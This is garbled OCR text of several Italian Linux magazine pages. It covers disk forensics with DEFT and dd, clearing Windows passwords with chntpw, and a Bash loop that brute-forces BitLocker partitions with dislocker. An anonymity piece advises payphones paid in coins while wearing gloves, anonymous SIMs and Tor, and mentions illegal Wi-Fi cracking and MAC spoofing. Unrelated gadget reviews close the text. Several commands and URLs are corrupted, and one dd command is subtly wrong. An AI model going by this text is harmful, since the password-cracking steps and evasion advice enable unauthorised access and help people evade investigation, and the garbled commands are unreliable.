Da qualche decennio, grazie a GNU/Linux, per le forze dell'ordine 
è possibile analizzare un computer messo sotto sequestro nel 
tentativo di ricavarne delle prove valide per l’incriminazione del 
sospettato. 


No dell'informatica anche i crimini e le relative inda- 


QUALE DISTRO USARE? 


Naturalmente, per l'ordinamento italiano, le prove si costituiscono 
nel dibattimento, ovvero durante il processo. È per questo motivo 
che è assolutamente fondamentale la ripetibilità delle operazioni: 
un inquirente deve certamente poter controllare il contenuto di un 
computer per trovare tracce di attività illegali prima del processo, in 
modo da sapere se avviare il procedimento giudiziario oppure no, 
ma deve poi riuscire anche a ripetere le stesse operazioni davanti ai 
giudici in modo da dimostrare l’effettiva esistenza delle prove. Per 
questo motivo è molto importante produrre un'immagine del disco 
che si vuole aràalizzare, in modo da controllarlo senza modificarlo. 

Spesso, infatti, sono preziosi i timestamp, i metadati che indicano 
quando ogni file è stato creato, modificato o letto. Ad esempio, 
riuscendo a dimostrare che un certo file, relativo ad argomenti 
criminali, è stato aperto in un specifico giorno, lo si può mettere in 
relazione con altri eventi. È quindi fondamentale che gli inquirenti 
non siano i primi ad inquinare le prove aprendo direttamente i file 
sul disco: in tal caso, infatti, i metadati dei file verrebbero modificati, 
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e risulterebbe che qualche file sia stato visualizzato o modificato 
dopo il sequestro del PC, rendendo quindi impossibile sapere 
che cosa abbia davvero fatto il sospettato e cosa invece sia stato 
fatto per errore degli inquirenti. Le forze dell'ordine hanno quindi 
bisogno di produrre un'immagine grezza del disco, sulla quale poi 
lavorare in sola lettura per tutto il tempo necessario, eventualmente 
anche producendone delle copie. Per questo, le distro progettate 
specificamente per la forensic analisys sono preziose: durante il loro 
avvio ignorano i dischi rigidi, lasciandoli quindi intatti, e permettono 
la produzione di un'immagine che potrà essere utilizzata come 
prova. 

Naturalmente, l’immagine può poi essere utilizzata con qualsiasi 
altra distribuzione GNU/Linux, in modo da lavorarci con comodità. 
Ad esempio, si può utilizzare Kali, che dispone già di molti 
programmi utili per forzare vari sistemi crittografici. Ma si può 
anche ricorrere ad una semplice Ubuntu, installando i programmi 
necessari. Per i nostri test, abbiamo preferito affidarci a DEFT 
Linux per la produzione dell'immagine del disco, mentre tutte le 
altre operazioni sono state provate su una normale Ubuntu. 


MONTIAMO UN FILE IMMAGINE 


Una semplice copia di un disco rigido si può eseguire con il 
comando dd if=/dev/sda of=./sda.img. 

Nel caso in cui il disco fosse danneggiato e/o parzialmente 
illeggibile, si può tentare un recupero dei settori ancora funzionanti 
con ddrescue -d -r3 /dev/sda test.img test.logfile che ha anche 
il pregio di poter essere ripetuto più volte fino ad ottenere la migliore 
lettura possibile del disco rigido danneggiato. Ciò che si ottiene, 
però, è l'immagine di un intero disco, con tutta la tabella delle 
partizioni. Come leggere quest'ultima? Basta lanciare parted sda. 
img. Questo fornirà un elenco dei vari offset delle partizioni; ad 
esempio, il risultato 
1 32256B 


106928639B 106896384B 


Download 


Cu agri pa rare i 1 


Procuriamoci una recente release di DEFT, ad esempio 

DEFT Zero, perfetta per il nostro scopo. Basta scaricar- 
la sul sito ufficiale www.deftlinux.net/it/download/ o prelevarla dal 
DVD allegato a questo numero di Linux Magazine. 


Esistono varie opzioni di boot, ma conviene affidar- 

si all'avvio in forma testuale. Questo garantisce la 
massima velocità e la minima possibilità di danneggiare il 
computer. Volendo, però, si può sempre avviare l'ambiente 
grafico col comando deft-gui. 


primary fat32 boot 
ci comunica che la prima partizione inizia a 32256 byte ed è di 
tipo fat32. A quel punto possiamo montarla con mount -o 
loop,ro,offset=32256 sda.img /mnt o addirittura creare un 
apposito file immagine, contenente soltanto tale partizione: dd 
if=sda.img of=sda1.img bs=512 skip= 32256. Il valore bs è la 
dimensione di un settore del disco, fornita da parted. Nel caso in 
cui il tipo di partizione non venga riconosciuto automaticamente da 
mount, basta aggiungere l'opzione -t, ad esempio: 


mount -o loop,ro,offset=32256 -t vfat sda.img /mnt 


sostituendo vfat con ntfs-3g nel caso in cui la partizione sia di tipo 
NTFS. 


| 


jazine/forensic/deftZ-2017-1.iso 


ISO wv 


file utente che verranno protetti dai vari ria\ | 0 


v | Unità: | /dev/sdb1 v OK | An 


L'immagine scaricata va scritta su una pendrive, utilizzan- 

do il programma Unetbootin (che si trova nella maggior 
parte dei repository delle distro GNU/Linux). La chiavetta USB diven- 
terà avviabile e potrà essere usata per avviare il PC da analizzare. 


Ora si può ottenere una lista delle partizioni con il co- 

mando fdisk -L, oppure con parted /dev/sda print. Se 
il proprio hard disk esterno è sdc e quello interno al PC è sda, si 
possono creare le immagini lanciando mount /dev/sdc /mnt e poi 
dd if=/dev/sda of=/mnt/sda.img. 


LA CRITTOGRAFIA DI WINDOWS 


Quando si indaga su qualcuno che memorizza i propri dati su PC, 
è facile che questa persona abbia pensato di proteggerli con un 
sistema crittografico. In questo caso, probabilmente quei dati sono 
persi per sempre: senza la password non è possibile decrittarli. 
Questo, però, a condizione che la password sia sufficientemente 
robusta: almeno 10 caratteri. Se la password è più breve, diventa 
effettivamente possibile scoprirla. | sistemi Microsoft Windows 
usano un sistema di crittografia chiamato Bitlocker, che si basa 
proprio sull'uso di una chiave di sicurezza: si può quindi tentare 
di decifrare i file usando proprio la tecnica del brute force. Ma è 
possibile accedere alle partizioni Bittocker da un sistema GNU/ 
Linux? Sì, usando il programma dislocker, che permette il 
montaggio di una partizione Bitlocker (a condizione di conoscere 
la sua password). 
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Disk /dev/sdb - 7933 MB / 7566 MiB - gston DT 101 GX 


Per avviare Testdisk basta aprire un terminale e lan- 

ciare sudo testdisk. Il programma chiede se si vuole 
tenere un log delle azioni e degli eventuali errori: può essere 
utile per capire cosa sia andato storto se il recupero dei file 
non viene portato a compimento. 


{Intel _]MG, 


È importante specificare il tipo di tabella delle par- 

tizioni del disco che si sta cercando di recuperare: 
la maggior parte dei dischi e delle pendrive ha una tabella 
Intel, mentre i dischi rigidi più moderni hanno partizioni di 
tipo EFIGPT. 


Il programma trova automaticamente le partizio- 

ni: è possibile che la partizione in cui si trovano i 
file che si stanno cercando non venga trovata. Ma, sceglien- 
do l'opzione Quick search, Testdisk procederà alla ricerca di 
partizioni danneggiate o eliminate. 
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Il primo menu di Testdisk permette la selezione del 

disco su cui si vuole operare: basta spostarsi con le 
frecce direzionali della tastiera e procedere premendo Invio. 
Se si vuole lavorare su un'immagine, basta fornirla nel termi- 
nale: sudo testdisk immagine.img. 


Testdisk offre varie opzioni: scrivendo L'MBR code si 

può ripristinare la leggibilità di un disco il cui Master 
Boot Record sia stato danneggiato. L'opzione più semplice è 
Analyse che permette di analizzare il disco alla ricerca di parti- 
zioni e file scomparsi. 
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Basta selezionare una partizione e premere il tasto P per 
ottenere un elenco dei file. Ci si ritrova con un semplice 
file manager che permette di spostarsi tra le varie cartelle: quan- 
do si trova un file (o una cartella) che si desidera recuperare, basta 


premere il tasto c. 


Password di Windows? Nessun problema! 


Ecco come i professionisti della computer forensics modificano password e permessi degli utenti 


Quello che ci occorre è il programma Chntpw. Av- 

viamolo con il comando sudo chntpw: viene pre- 
sentata una serie di istruzioni. La prima scelta da fare è 
indicare la partizione su cui è installato il sistema Windows 
(ad esempio, sda1). 


Lavorando su SAM è possibile modificare i dati 

degli utenti e le password, ma anche elencare i 
gruppi di sistema e modificare le voci di registro. L'opzione 
da scegliere è la numero 1: basta premere il tasto Invio. 


L'opzione più semplice, una volta scelto l’uten- 

te, è ovviamente cancellare la sua password 
premendo il tasto 1. Però, scegliendo l'opzione 3 è an- 
che possibile trasformare un utente semplice in ammi- 
nistratore. 


Se è stata selezionata la partizione corretta, il 

programma mostra i principali file di sistema. 
Vengono poi offerte alcune opzioni: quella predefinita, la 
numero 1, è quella adatta alla modifica del registro delle 
password (cioè SAM). 


A questo punto, il programma mostra l'elenco degli 

utenti presenti nel sistema, inclusi quelli nasco- 
sti. Ogni utente è identificato da un codice RID: per scegliere 
l'utente su cui lavorare basta digitare il rispettivo RID. 


Eseguite le operazioni desiderate premiamo q, 

confermando, per ritornare al menu precedente, 
fino ad uscire dal programma. Se abbiamo fatto delle modi- 
fiche, ci verrà chiesto di confermare la scrittura sul disco, 
premendo il tasto Y. 


Prima di tutto è necessario procurarsi dislocker, che 

viene fornito sotto forma di codice sorgente per di- 
versi OS: basta lanciare wget At{p:/www.hsc.fr/ressources/outils/ 
dislocker/download/dislocker-0.Z.1.tar.gz. 


File Modifica Visualizza Segnalibri Impostazioni © Aluto 


Si devono quindi installare le varie dipendenze ne- 

cessarie per la compilazione: su un sistema di tipo 
Debian, il comando da eseguire è sudo aptitude install gcc 
cmake make libfuse-dev libmbedtls-dev ruby-dev 


IL BRUTE FORCE CON DISLOCKER 


Sesi vuole eseguire un attacco ditipo brute force (letteralmente, 
a "forza bruta"), bisogna prima di tutto costruire un dizionario, 
cioè un file contenente tutte le parole che si vogliono provare 
come password. Questo si può fare con molti software ed 
esistono dizionari già pronti all'uso (basta fare una rapida 
ricerca sul Web per trovare dizionari di diversi GB contenenti 
milioni di combinazioni di lettere e numeri che formano tra loro 
parole, di senso compiuto e non). Fra i vari software disponibili, 
il più semplice è forse BF-Words, scaricabile gratuitamente 
dalla pagina Web www.edmaster.it/url/6576. 

Ad esempio, per produrre un dizionario di parole (che 
vengono generate in maniera puramente casuale) fino a 5 
caratteri si lancia ./bf-words 1 5 > temp.txt. Così facendo, 
tutte le parole generate vengono salvate in un nuovo file di 
testo, temp.ixt. Per cambiare la lunghezza delle parole da 


L'archivio va poi estratto con il comando tar -xvf di- 
slocker-0.7.1.tar.gz. Questo crea una serie di cartel- 
le. Entriamo nella directory principale con cd dislocker-0.7.1. 
Lanciando il comando ls noteremo la presenza di un file cmake. 


Si può ora verificare che tutto il necessario per la com- 

pilazione sia presente sul proprio sistema: lanicamo 
cmake . e, se il comando termina con la riga Build files have 
been written, allora tutto sta procedendo per il verso giusto. 


generare, basta cambiare l'opzione che segue ./bf-words 
‘i. Dopo che il dizionario è stato generato correttamente, è 
sufficiente realizzare un piccolo script Bash capace di leggere 
le parole contenute le file di test generato e prova ad utilizzarle 
per montare la partizione specifica. Come scrivere questo 
script? Nulla di più semplice. Ecco qui di seguito un esempio 
funzionante che abbiamo utilizzato per il nostro test: 


while read -r line 
do 
password="$line" 
dislocker -v -V /dev/sdbl -u$password -- /mnt/tmp 
if [ -f /mnt/tmp/dislocker-file ]; then 
break 
fi 
done < "temp.txt" 


Decifrare le partizioni NTFS protette con Bitlocker 


Dopo aver installato dislocker, i Security Admin lo utilizzano per decifrare e montare partizioni 


Ho Dipotico Vira — Sgt) — Imgrostzioni _d0vto 


Dopo aver verificato che tutte le librerie neces- 

sarie siano installate, possiamo procedere con la 
compilazione vera e propria di dislocker. Per farlo, ci basta 
lanciare ilcomando make. Questo richiederà qualche minu- 
to, ma non dovrebbe causare errori. 


Per poter lavorare comodamente, dislocker va 

poi installato sul sistema usando il comando 
sudo make install. Questo permetterà l'esecuzione del 
programma dando semplicemente dislocker su qualsia- 
si terminale. 


Si può verificare la corretta installazione di dislocker 

con ilcomando dislocker --help, che mostra le opzio- 
ni del programma. Come si può intuire, dislocker offre diverse 
opzioni per decifrare un disco, come la password o la clearkey. 


Si può provare a decrittare una partizione con 

distocker -v -V /dev/sdb1 -ulamiapassword -- / 
mnt/tmp. Ovviamente, /dev/sdb1 è la partizione, mentre 
/mnt/tmp il punto di montaggio (al cui interno si trova un 
file che a sua volta va montato). 


Per fare una prova pratica, la prima cosa da fare è 

lanciare sudo fdisk -L, in modo da identificare la par- 
tizione che vogliamo decifrare. Ovviamente, nel nostro caso, 
sarà una partizione di tipo NTFS/HPFS (Microsoft Windows]. 


© resa opsssore Baton fim Pato 


zorbasrorect | biwmerds Our | dee 1 ii 


One 


A tivi Para nerda cascato 


Con mount -o loop,ro /mnt/tmp/dislécker-file / 

mnt/dis, otteniamo i file decifrati. Se non si co- 

nosce la password, però, usiamo BF-Word per eseguire un 

“attacco” di tipo brute force [vedi paragrafo alla pagina ac- 
canto, Il brute force con dislocker). 

Hit 
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PROTEZIONE DEI DATI CON GPG 

Quando ci si vuole rendere irreperibili, è necessario 
partire dall'idea che le persone dalle quali vogliamo 
nasconderci potrebbero avere accesso a qualsia- 

si risorsa. Significa che la nostra sicurezza deve 
basarsi sulla tecnologia che utilizziamo e non sul 
semplice fatto che nessuno la conosca: inventare una 
password complicata non è una protezione sufficien- 
te, perché esiste sempre la possibilità che qualcuno 
riesca ad indovinarla tirando a caso. Ma utilizzando 
un sistema di cifratura che dal punto di vista mate- 
matico non può essere invertito (come il metodo di 
Vigenere con blocco monouso, oppure il GPG con 
chiave ad almeno 1024-2048 bit) possiamo essere 
sicuri che nessuno sarà in grado di scoprire i nostri 
segreti. Almeno non in tempi utili perché la sicu- 
rezza è, alla fin fine, una questione di tempo: nulla 
rimarrà segreto per sempre. 

Parlando di comunicazioni, le possibilità per non 
essere rintracciabili sono fondamentalmente due: 
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uscire dall'interlink (evitando di utilizzare telefoni, 
Internet ed il sistema bancario) oppure confondere 
le proprie tracce con quelle di qualcun altro (con 
Tor ed i Bitcoin, ad esempio) in modo da rendere di 
fatto impossibile la propria identificazione. La prima 
di queste due opzioni è decisamente poco pratica, 
perché richiede lo svolgimento di buona parte delle 
proprie attività di persona (il che diventa complicato 
quando si deve lavorare con persone che si trova- 
no a migliaia di chilometri di distanza). La strada 
migliore, quindi, consiste nel seguire la seconda 
ipotesi. Ma non esiste una soluzione unica per tutti 

i possibili ambiti: dobbiamo valutare caso per caso. 
Per cominciare, consideriamo le telefonate. È ormai 
abbastanza chiaro che qualsiasi comunicazione 
telefonica eseguita da un numero (fisso o mobile) 
registrato a nostro nome è in qualche modo traccia- 
bile, almeno per i suoi metadati. Gli unici telefoni 
“immuni” sono quelli che non ci appartengono e 
che non possono essere correlati a noi, ad esempio i 
telefoni pubblici (che sono ancora abbastanza diffusi 
nelle città italiane). È opportuno utilizzare questi 
telefoni per le chiamate che non vogliamo vengano 
intercettate. Ed è importante pagare le chiamate con 
monete, e non con tessere telefoniche. Infatti, una 
tessera telefonica può essere tracciata ed identifi- 
cata nel caso venisse utilizzata una seconda volta, 
fornendo quindi al gestore telefonico la mappa dei 
nostri spostamenti (in altre parole, si può sapere da 
quale telefono ed a quale ora abbiamo eseguito una 
chiamata). Il pagamento in monete è l'unico metodo 
anonimo: addirittura, usando dei guanti non si corre 
il rischio di lasciare impronte né sul telefono né 
sulle monete. 

Ad alcuni, però, questo metodo sembra poco pratico 
(considerato che le cabine telefoniche non si trovano 
ovunque e per raggiungerle può essere necessario 
del tempo) e quindi c'è chi ricorre ad una SIM card 
anonima. Funziona come qualsiasi altra SIM card, 
con la differenza che il suo numero telefonico non 
viene associato al nome dell'utilizzatore e non viene 
richiesto alcun documento. Per quanto riguarda la 
navigazione Internet, chi vuole inviare o prelevare 
documenti senza la possibilità di essere rintraccia- 
to non si accontenta di Tor. Ad esempio, c'è chi si 


Le e-mail diventano anonime! 


Con GuerrillaMail e KGPG si possono inviare messaggi senza essere intercettati 
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GUERRILLA MAIL 


01 Per cominciare, apriamo il browser configurato 

per utilizzare la rete Tor, meglio se stiamo usan- 

do il programma TorBrowser. Il sito da raggiungere è www. 

guerrillamail.com/it. Appena aperto, ci offre una casella 
email temporanea. 


om 
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CIFRATURA GPG 


Per maggiore sicurezza, conviene inviare il messag- 

gio dopo averlo crittografato. Su una distro GNU/LI- 
nux la soluzione migliore è il programma KGPG, che dispone 
di un semplice editor di testo il quale, tramite il pulsante Crit- 
ta permette la cifratura con GPG. 


connette illegalmente (crackando la password) ad 
una rete Wi-Fi e modificando l'indirizzo MAC della 
scheda di rete in modo da non essere assolutamente 
rintracciabile. Naturalmente, anche le e-mail “co- 
muni” non sono molto anonime, visto che spesso i 
provider chiedono documenti di identità, un numero 
di telefono, o un altro indirizzo e-mail di riferi- 
mento. Ma si può ottenere una e-mail temporanea 
gratuita: un esempio è il servizio Guerrilla Mail 
(www.guerrillamail.com/it)). Questo sito Web offre una 
casella di posta elettronica tramite la quale leggere 
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INVIO DI UNA E-MAIL 

Il bello di GuerrillaMail è che consente anche 
l'invio delle e-mail e non solo la ricezione. Pos- 
siamo scrivere una e-mail ad un qualsiasi indirizzo di 
destinazione, senza limiti al testo del messaggio ed ab- 
biamo anche la possibilità di inviare allegati. 
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boots crptiest 


can enter data to be encoded/decoded by uploading a file or directiy into the textarea below. Encoded baseG4 ciata can 
be split in lines each 76 chars long. Ì 
Ù uses PHPS base64 functions which in turn compiy to the RFC 2045 standare. È 


Data to process: > 


| «ga | 

| Download result? Yes, domnicad. Il 

iene ne No j È 
inn i = i | 
ALLEGATI BASE64 


Se vogliamo inviare anche un file allegato, possiamo 

tradurlo in un testo grazie al sito http:/i-tools.0rg/ 
base64 e inseriamo poi tale testo in KGPG per cifrarlo assieme 
al messaggio con la chiave del destinatario garantendo dunque 
la sicurezza del materiale che inviamo. 


ed inviare e-mail: la caselle esisterà soltanto finché 
il browser viene tenuto aperto, perché appena verrà 
chiuso, la casella verrà distrutta assieme ai suoi dati. 
Naturalmente, per inviare dei file è possibile, invece 
di usare gli allegati, trasformare un qualsiasi file un 
un testo Base64, da inserire nel messaggio di posta 
elettronica. Il destinatario non dovrà fare altro che 
copiare il testo e tradurlo nuovamente in file. Per 
farlo si possono usare programmi come Base64De- 
coder (htip://sourceforge.net/projects/base64decoder/) O servizi 
on-line (ad esempio Attp://i-tools.org/base64). 
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Una coppia di chiavi crittografiche 


GPG è troppo complesso? Kleopatra rende tutto più semplice! 


certì | © Crenunacoppiadi chiavi personali OpenPGP 

- | Le chiavi OpenPGP sono create in locale e certificate da amici e conoscenti. 
Non c'è un'autorità di certificazione centrale; alcontrario; ogni individuo i 
crea una rete di fiducia personale certificando le coppie di chiavi degli altri | 
utenti con il proprio certificato. 
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UN CERTIFICATO 

0 1 Se è la prima volta che utilizziamo Klevtalia, avre- 
mo bisogno di creare una nuova coppia di chiavi (una 

pubblica per cifrare i messaggi, ed una privata per decifrarli). 

Basta cliccare sul menu File/Nuovo certificato e scegliere la 

coppia la chiavi personali OpenGPG. 


LA PASSPHRASE 

Per la creazione della coppia di chiavi ci viene 
richiesta una passphrase (almeno 8-10 caratteri). Ci 
verrà chiesta ogni volta che vorremo leggere i messaggi che 
ci vengono inviati: è una forma di protezione nel caso in cui ci 
venisse rubato il computer. 


A Aderire savertomente. 
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CI FIDIAMO? 

Ci viene chiesto anche se riteniamo di poterci fidare 
dell'autorità di certificazioni digitali CA cert. Se ab- 
biamo scaricato Kleopatra dal sito ufficiale o dal gestore dei 
pacchetti della nostra distribuzione GNU/Linux, possiamo ri- 
spondere in modo affermativo. 
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NOME ED E-MAIL 

Due dati fondamentali per la costruzione di una cop- 
pia di chiavi sono il nostro nome e l'indirizzo e-mail. 
Si tratta di dati arbitrari: sia il nome che l'indirizzo possono 
anche essere falsi. Servono solo per riconoscere la chiave 
che usiamo al momento. 


POSA Procedura guidata per la creazione del certificati 
si val Craszione chii 
Laglnparto vt La chieve è stata creata. 


TESTO CASUALE 

0 b Affinché la chiave sia davvero sicura, deve essere 
costruita in modo casuale. Infatti, ci viene chiesto 
di digitare del testo in una apposita casella. La procedura 
andrà avanti automaticamente quando Kleopatra riterrà che 
abbiamo scritto abbastanza. 
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ESPORTAZIONE 

Possiamo esportare la chiave pubblica (chiamata 
certificato) cliccando su di essa col tasto destro del 
mouse e scegliendo Esporta certificati. Ci verrà permesso di 
salvare un file di testo con estensione ASC, che possiamo poi 
inviare ai nostri amici o pubblicare sul Web. 


Gifriamo e decifriamo un file 


Proviamo a rendere davvero sicuro un qualsiasi documento del nostro PC 


L'IMPORTAZIONE 

Chi vorrà scriverci non dovrà fare altro che impor- 

tare il nostro certificato, ovvero la nostra chiave 
pubblica. Può farlo con ilmenu File/Importa certificati. Una 
finestra di dialogo gli permetterà di scegliere il file ASC. 


IL DESTINATARIO 
0 3 L'ultimo passaggio consiste nello scegliere i destina- 
tari. È possibile cifrare lo stesso file per diversi desti- 
natari, anche se di solito lo si fa per uno soltanto: basta sceglie- 
re il destinatario dall'elenco delle chiavi pubbliche importate e 
premere il pulsante Cifra. 


Liz 


LA PASSPHRASE 

Per accedere alla nostra chiave privata e deci- 

frare il file, è necessario digitare la passphrase 
{la stessa che avevamo indicato durante la creazione della 
coppia di chiavi). Così un eventuale ladro non potrà leggere 
i file, perché non conosce la passphrase. 


CIFRARE UN FILE 

Per inviare un file ad un nostro amico, del quale dispo- 

niamo già della chiave pubblica [il certificato), basta 
scegliere il menu File/Firma-Cifra file. Dovremo selezionare il 
file in questione e scegliere l'opzione Cifra tra le varie disponibili. 


DECIFRARE FILE 

Quando siamo noi a ricevere un file cifrato, pos- 

siamo decifrarlo scegliendo il menu File/Decifra- 
verifica file. Non sarà necessario specificare per quale del- 
le nostre chiavi private il file sia stato cifrato: Kleopatra lo 
capirà da solo. 


DALLA TRAYBAR 

Le principali funzioni di Kleopatra sono dispo- 

nibili direttamente dalla sua icona nella barra 
di sistema: in questo modo risparmiamo tempo quan- 
do vogliamo inviare file o leggere quelli che abbiamo 
ricevuto. 
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Un Galaxy S 9] +3 


a poco 
prezzo? 


Uno smartphone dal look pregiato 
non deve essere obbligatoriamente 
costoso. È il caso del Galaxy 35 


Gli smartphone Samsung della serie S sono senza dubbio le star 
nel momento: ad ogni nuova uscita di un device dal logo Galaxy S, 
c'è chi fa i salti mortali per accaparrarsene uno. Non tutti gli utenti 
però sono disposti a spendere centinaia di euro per un telefonino 
(il Galaxy S7, ad esempio, ha un costo paragonabile a quello di 
un notebook dalle discrete prestazioni) e infatti non è obbligatorio, 
considerato che ora è possibile acquistare a poco più di 170 euro 
il nuovo Samsung J5. Ma a questo prezzo straordinario offre an- 
che tutta l'ottima tecnologia di Samsung? Per dare una risposta a 
questa domanda, abbiamo deciso di metterne un esemplare alla 
prova. Riuscirà ad esaudire i desideri di chi utilizza lo smartphone 
unicamente per chiamare, inviare messaggi, controllare la posta 
elettronica o le ultime novità in arrivo dai social network? Scopria- 
molo subito! 


CARATTERISTICHE IN BREVE 


Il Galaxy S7 Edge, modello top di gamma di Samsung, richiede un 
prezzo almeno triplicato, ma il J5 non sfigura affatto. Questo smar- 
tphone economico vanta addirittura un ampio schermo HD da 5,2 
pollici, con una risoluzione di 1280 x 720 pixel. La densità di 282 
ppi, sufficientemente elevata per non rendere visibili i minuscoli pi- 
xel. Il display del 45 consente anche di riprodurre video, immagini 
e app, con colori intensi e contrasto elevato, grazie all'utilizzo della 
nota tecnologia AMOLED già presente sull’S7. Il J5 è racchiuso in 
un elegante telaio di alluminio, che gli conferisce il consueto look 
raffinato degli smartphone serie S. Un’altra peculiarità straordina- 
ria del J5 è che la sua poderosa batteria può essere sostituita: una 
possibilità, oggi piuttosto rara. La parte posteriore del dispositivo, 
realizzata in plastica di qualità mediocre, svela dove l’azienda su- 
dcoreana ha risparmiato. 


LA PAZIENZA È D'OBBLIGO 


A bordo del J5 sono stati riscontrati però anche altri punti deboli. 
La fotocamera posteriore da 13 Megapixel non brilla per la qualità 
delle immagini poiché, con luce scarsa, le fotografie mostrano un 
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rumore digitale troppo intenso. Per i selfie è però disponibile un lu- 
minoso flash a LED, che non offre neppure l’S7. Il processore Qual- 
comm non vanta prestazioni da record, ma i suoi quattro core of- 
frono però potenza sufficiente per funzioni poco complesse come 
WhatsApp e Facebook, rivelandosi tuttavia un po’ lento con giochi 
semplici come Pokemon Go. La lentezza nell’apertura delle app e 
la navigazione poco fluida del menu, evidenziano però l'enorme 
differenza con gli smartphone Premium notevolmente più costosi. 


CONCLUSIONI 


Samsung, grazie al J5, si piazza ottimamente anche nel segmento 
degli smartphone entry level ed è in grado di offrire un dispositivo 
raffinato come quelli della serie Galaxy S. La tecnologia presente 
sul J5 non è però in grado di competere con la serie S. Chi vorrà 
avvalersi diuno smartphone Samsung, potrà comunque orientarsi 
sul J5. Occorre però sottolineare che dispositivi con prezzi similari, 
come il Moto G4 di Lenovo e l’Honor 5C si rivelano però migliori, 
grazie a display Full HD ed ad una potenza più elevata. 
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Samsung: è lora , x 


della verità 


Galaxy Gear S3 è il nuovo smartwatch 
della casa coreana. Il suo punto di forza? 
Compatibilità con tutti gli smartphone 


algrado le dimensioni compatte, il Gear S3 offre una 
M batteria da 380 mAh, che per uno smariwatch si ri- 
vela piuttosto poderosa. Nelle prove, con un utilizzo 
quotidiano normale, la batteria ha offerto un'autonomia legger- 


mente più lunga di due giorni interi. Quando la batteria è sca- 
rica, basterà ricorrere al caricabatteria wireless in dotazione. 


RUOTARE, SFIORARE, PREMERE 


Analogamente al predecessore Gear S2, l'utente potrà coman- 
dare il Gear S3 tramite gesti a sfioramento, premendo dei tasti 
e ruotando la lunetta per selezionare una delle 24 posizioni che 
attivano le funzioni dell'orologio. Tutto questo potrà sembrare 
complicato, ma consentirà di accedere velocemente alle diverse 
funzionalità: ad esempio, basterà ruotare la lunetta per visualiz- 
zare immediatamente le app utilizzate più frequentemente. L’im- 
permeabile Gear S3 potrà essere inoltre gestito anche attraverso 
comandi vocali (5-Voice). Poiché l'orologio dispone anche di uno 
speaker, sarà possibile usarlo anche in modalità vivavoce. Il Gear 
S3 consente di rilevare otticamente il battito cardiaco direttamen- 
te dal polso. Necessita di dieci minuti per riconoscere automati- 
camente le diverse attività sportive e per inserire correttamente i 
parametri nell’app integrata per il fitness S-Health. 


SOTTO IL QUADRANTE 


Il display touch (AMOLED), leggermente più grande di quel- 
lo del Gear S2, vanta una diagonale di 3;3 centimetri ed una 
risoluzione di 360 x 360 pixel, che lo rende estremamente 
nitido e luminosissimo. Un sensore per la luce ambientale è 
in grado di aumentarne ulteriormente la luminosità quando 
necessario. Tutto questo favorisce la lettura ottimale anche 
di quadranti con disegni finemente lavorati. Una particolare 
modalità per il risparmio energetico provvede, all'occorrenza, 
a commutare in bianco e nero la colorazione del quadran- 
te dell’orologio. A differenza di altri smartwatch, il Gear S3 
nella modalità di risparmio energetico continua a rimanere 
un orologio intelligente, che consente di visualizzare anche le 
segnalazioni delle app e le notifiche dei messaggi pervenuti 
sullo smartphone. A prima vista il vetro di copertura per il di- 
splay, scelto da Samsung, si rivela deludente poiché anziché 
essere di zaffiro, è un Gorilla Glass SR+. 


a rd wa r 


NON SOLO SAMSUNG 


| primi smartwatch di Samsung supportavano solo smart- 
phone dello stesso produttore. Ora la situazione è cambia- 
ta, infatti il Gear S3 può essere abbinato ufficialmente a un 
qualsiasi smartphone Android, con sistema a partire dalla 
versione 4.4 e on almeno 1,5 GB di memoria libera. È stato 
precisato in via non ufficiale, che l’orologio è in grado di la- 
vorare anche in abbinamento con l’iPhone. L'orologio è equi- 
paggiato con Tizen, sistema operativo proprietario di Sam- 
sung, ed è interessante che, a detta del produttore, siano già 
disponibili ben 11.000 app. 


TIRIAMO LE SOMME 


Il Samsung Gear S3 si presenta come il numero 1 tra tutti gli 
smartwaitch. Si distingue per una lunga autonomia, un aspetto 
robusto e grintoso e per le numerose funzioni. 


sso. 
PIPa 
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d w a r e 


iochi sotto controllo! 


Grazie al nuovo controller touch, anche il visore Oculus Rift 
consente di “toccare” la realtà virtuale 


hi vuole vivere alla grande l’esperienza della realtà virtua- 

le, oltre ad un PC adatto, necessita di un ottimo paio di 

occhiali VR. Il mercato è attualmente capeggiato da HTC 
Vive, Sony Playstation VR e Oculus Rift. Fino ad oggi, l’Oculus Rift 
presentava però uno svantaggio: i giochi potevano essere gestiti 
solo attraverso un gamepad tradizionale e solo i movimenti della 
testa venivano trasferiti nella realtà virtuale. Con i nuovi controller 
Touch (199 euro) la situazione è cambiata: anche i giocatori che 
utilizzano il visore Oculus potranno d’ora in poi spostarsi a piacere 
nella stanza e afferrare con le mani gli oggetti virtuali. Il test svela se 
Oculus Rift offre ora il migliore sistema per la realtà virtuale. 


STRINGERE IL PUGNO VIRTUALMENTE 


A prima vista, l'aspetto dei controller touch ricorda un gamepad 
diviso a metà. | tasti sono però disposti diversamente, per simulare 
i vari movimenti della mano. Il controller si adatta sia al palmo della 
mano sinistra che destra e si posiziona bene tra le dita. Per mani 
grandi, le impugnature si rivelano un po’ troppo corte e manca an- 
che una superficie di appoggio per fare riposare le mani. A pro- 
posito di pause per fare riposare le mani stanche, dovrete sempre 
stringere bene le fascette di supporto del controller, perché dopo 
faticose sessioni di gioco in VR la superficie liscia del controller di- 
venta scivolosa. | tasti offrono un confortevole punto di pressione 
e sono comodi da raggiungere con il pollice, l'indice e il dito medio. 
Salta subito all'occhio l’anello in plastica che abbellisce il controller. 
| sensori a infrarossi integrati nel dispositivo consentono di deter- 
minare la posizione precisa nella stanza, mentre la videocamera 
inclusa nella dotazione rileva il segnale ed invia i dati al PC. 


SUDARE ANZICHÉ STARE SEDUTI 


L'uso contemporaneo di occhiali, videocamera e controller, con- 
sente al giocatore di muoversi con tutto il corpo nel (vero) ambiente 
di gioco. A seconda del tipo di videogioco, i vostri movimenti ver- 
ranno trasmessi a maghi, sportivi o artisti. Con il sistema Oculus 
Rift, la superficie di gioco di 1,5 x 1,5 metri, è purtroppo piuttosto 
limitata. L’HTC Vive, ad esempio, offre un’area di gioco grande più 
del doppio. La configurazione del Vive richiede però un tempo net- 
tamente più lungo rispetto al Rift, che consente di entrare in azione 
in pochi minuti. 


COMODISSIMO DA GESTIRE 


Nelle prove, l’esperienza immersiva con l’Oculus Rift è stata con- 
vincente: l'immediato trasferimento dei movimenti ha consentito di 
eseguire gesti con la mano di precisione millimetrica. E la com- 
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patibilità con GNU/Linux? Nessun problema. Con una semplice 
ricerca su Web si può scoprire come configurarlo alla perfezione 
su Ubuntu o altre distribuzioni. 


CONCLUSIONI 


Il progetto si è realizzato: Oculus con i nuovi controller touch of- 
fre un’esperienza di gioco ancora più convincente. Grazie ai voti 
